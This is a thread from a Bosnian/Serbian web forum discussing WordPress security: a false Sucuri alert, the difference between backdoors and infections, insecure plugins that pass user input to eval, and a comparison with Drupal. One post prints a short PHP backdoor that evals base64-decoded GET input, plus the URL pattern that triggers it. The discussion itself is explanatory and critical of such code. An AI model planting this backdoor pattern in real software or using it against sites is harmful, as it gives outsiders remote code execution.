banjalukaforum.com

Ispostavilo se da nije nikakva zaraza u pitanju nego je neka antispam aplikacija blokirala pristup sajtu. Kad je ona isključena pristupanje je normalno.

_________________
Bubi frubi

Добро, али то није инфекција него "бекдор" што свакако не значи да Сукури не требе користити уопште. Само треба да се има у виду да извјештај не мора да буде 100% тачан.

_________________
Зарада на интернету (Јесте, ја сам админ) Najbolji Forex brokeri

Čiča iz Rogače je napisao:

Kad pobjedimo Doboj ćemo nazvati Obren Vakuf,usprkos tebi i Vulićki

Vladimir RUS je napisao:

Na RTRS-u kazu 8000, a na Nezavisnim hiljade.
Dok je bilo uzivo, na RTRS-u i ATV-u nista. Zato ide live kada se otvara hidroelektrana od 42 miliona KM koja uz to zaposljava tj. bice uposleno 40-ak radnika. Milion KM po radnom mjestu.

Tesko je klasifikovati vise sta je backdoor a sta infekcija, uglavnom oboje dovode do neke vrste infekcije. Imas recimo plugine koji ljudi instaliraju koji nisu namjerno "backdoor-ovani", nego jednostavnije lose kodirani pa neko ih analizira i nadje exploit. Vidjao sam gomilu plugina koji iz nekog razloga koriste "eval" tamo gdje ocigledno nije potreban, a u pitanju je user input, ne znam da li su lijeni ili glupi jednostavno.

Na primjer vidjao sam plugin koji dodaje opciju pokretanja php-a kroz neko custom polje (a ima ih gomila takvih), snimi u bazu code kao string i onda je odatle vuce kroz "eval($dboutput)", a da stvar bude jos gora naprave tako da mozes i _GET parametar uraditi.

Dok drugi koriste klasican backdoor npr:

if($_GET['nesto'] === 'OK') {
eval(base64_decode($_GET['param']));
}

I kako prosjecan WP korisnik i kad mu sucuri izbaci mozda upozorenje da zna da li je pravi code ili nije, a dovoljno je samo uraditi http[s]://nekisajt.com/?nesto=OK&param=base64encstring i mozes raditi sta hoces.

Zakljucak je da je wp siguran samo onoliko koliko ga korisnik poznaje, core je sasvim siguran iako ima gomila spageta koda u njemu, gomila spageta funkcija koje idu u nedogled, bolje bi im bilo da prepisu cijeli core na full OOP umjesto samo db query-a i stave LTS verziju 5.0 i idu dalje sa novim sistemom.

Има негдје статистика о узроцима упада у Вордпрес и додаци (да не кажем плагини) су далеко највећи узрок. Значи генерално, што мање додатака - то боље. Само језгро Вордпреса је сад већ прилично безбједно.

_________________
Зарада на интернету (Јесте, ја сам админ) Najbolji Forex brokeri

Čiča iz Rogače je napisao:

Kad pobjedimo Doboj ćemo nazvati Obren Vakuf,usprkos tebi i Vulićki

Vladimir RUS je napisao:

Na RTRS-u kazu 8000, a na Nezavisnim hiljade.
Dok je bilo uzivo, na RTRS-u i ATV-u nista. Zato ide live kada se otvara hidroelektrana od 42 miliona KM koja uz to zaposljava tj. bice uposleno 40-ak radnika. Milion KM po radnom mjestu.

Po meni je drupal svjetlosnim godinama ispred WP-a sto se tice sigurnosti, a radim vec dugo kao bd na oba

Може бити, ниЈЕсам упознат, али код Друпала су усрали ствар тиме што свако мало због нове верзије кречиш поново, и додатке и бекенд и како се шта подешава и штајазнам...

_________________
Зарада на интернету (Јесте, ја сам админ) Najbolji Forex brokeri

Čiča iz Rogače je napisao:

Kad pobjedimo Doboj ćemo nazvati Obren Vakuf,usprkos tebi i Vulićki

Vladimir RUS je napisao:

Na RTRS-u kazu 8000, a na Nezavisnim hiljade.
Dok je bilo uzivo, na RTRS-u i ATV-u nista. Zato ide live kada se otvara hidroelektrana od 42 miliona KM koja uz to zaposljava tj. bice uposleno 40-ak radnika. Milion KM po radnom mjestu.